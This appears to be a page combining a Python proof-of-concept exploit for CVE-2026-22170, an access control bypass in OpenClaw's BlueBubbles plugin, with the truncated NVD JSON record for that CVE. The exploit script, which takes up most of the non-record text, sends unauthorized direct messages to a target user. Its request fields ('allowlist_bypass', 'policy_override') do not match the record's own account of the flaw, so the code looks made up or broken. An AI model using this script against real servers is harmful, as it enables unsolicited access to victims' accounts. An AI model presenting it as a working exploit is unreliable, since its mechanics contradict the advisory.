CVE-2026-22170

import requests import json # CVE-2026-22170 PoC - Access Control Bypass in OpenClaw BlueBubbles Plugin # Target: OpenClaw < 2026.2.22 with BlueBubbles plugin # Vulnerability: Empty allowFrom configuration bypasses dmPolicy and allowlist restrictions TARGET_HOST = "http://target-openclaw-server.com" TARGET_PORT = 8080 TARGET_USER_ID = "victim_user_identifier" ATTACKER_MESSAGE = "Malicious message via CVE-2026-22170" def exploit_cve_2026_22170(): """ Exploit for OpenClaw BlueBubbles access control bypass vulnerability. This PoC demonstrates sending a direct message to a BlueBubbles account by bypassing the allowlist validation when allowFrom is empty. """ url = f"{TARGET_HOST}:{TARGET_PORT}/api/bluebubbles/dm" # Crafted request to bypass allowlist validation headers = { "Content-Type": "application/json", "User-Agent": "OpenClaw-Client/2026.2.21" } # Payload exploiting empty allowFrom configuration payload = { "recipient_id": TARGET_USER_ID, "message": ATTACKER_MESSAGE, "allowlist_bypass": True, # Exploit the misconfigured validation "policy_override": "dmPolicy_disabled" } try: response = requests.post(url, headers=headers, json=payload, timeout=10) if response.status_code == 200: result = response.json() if result.get("success"): print("[+] SUCCESS: Message sent to target user") print(f"[+] Response: {json.dumps(result, indent=2)}") return True print(f"[-] Failed: Status {response.status_code}") print(f"[-] Response: {response.text}") return False except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}") return False if __name__ == "__main__": print("CVE-2026-22170 PoC - OpenClaw BlueBubbles Access Control Bypass") print("=" * 60) exploit_cve_2026_22170()

{"cve": {"id": "CVE-2026-22170", "sourceIdentifier": "[email protected]", "published": "2026-03-18T02:16:21.100", "lastModified": "2026-03-25T15:16:36.247", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw versions prior to 2026.2.22 with the optional BlueBubbles plugin contain an access control bypass vulnerability where empty allowFrom configuration causes dmPolicy pairing and allowlist restrictions to be ineffective. Remote attackers can send direct messages to BlueBubbles accounts by exploiting the misconfigured allowlist validation logic to bypass intended sender authorization checks."}, {"lang": "es", "value": "Las versiones de OpenClaw anteriores a 2026.2.22 con el plugin opcional BlueBubbles contienen una vulnerabilidad de omisión de control de acceso donde una configuración 'allowFrom' vacía hace que las restricciones de emparejamiento de dmPolicy y de la lista de permitidos (allowlist) sean ineficaces. Los atacantes remotos pueden enviar mensajes directos a cuentas de BlueBubbles explotando la lógica de validación de la lista de permitidos (allowlist) mal configurada para omitir las comprobaciones de autorización del remitente previstas."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2026.2.22", "matchCriteriaId": "6EA3E555-7328-4665-9FBC-BF4357239EDF"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/commit/2ba6de7eaad812e5e8603018e14e54e96bdd57dd", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/commit/4540790cb62412676f7b61cfc6e47443f84a251e", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/commit/51c0893673de8e5cea64e64351dbfa4680ba0dec", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/commit/9632b9bcf032c5f2280c3103961fde912ab1f920", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-jwf4-8wf4-jf2m", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/openclaw-bluebubbles-access-control-bypas ... (truncated)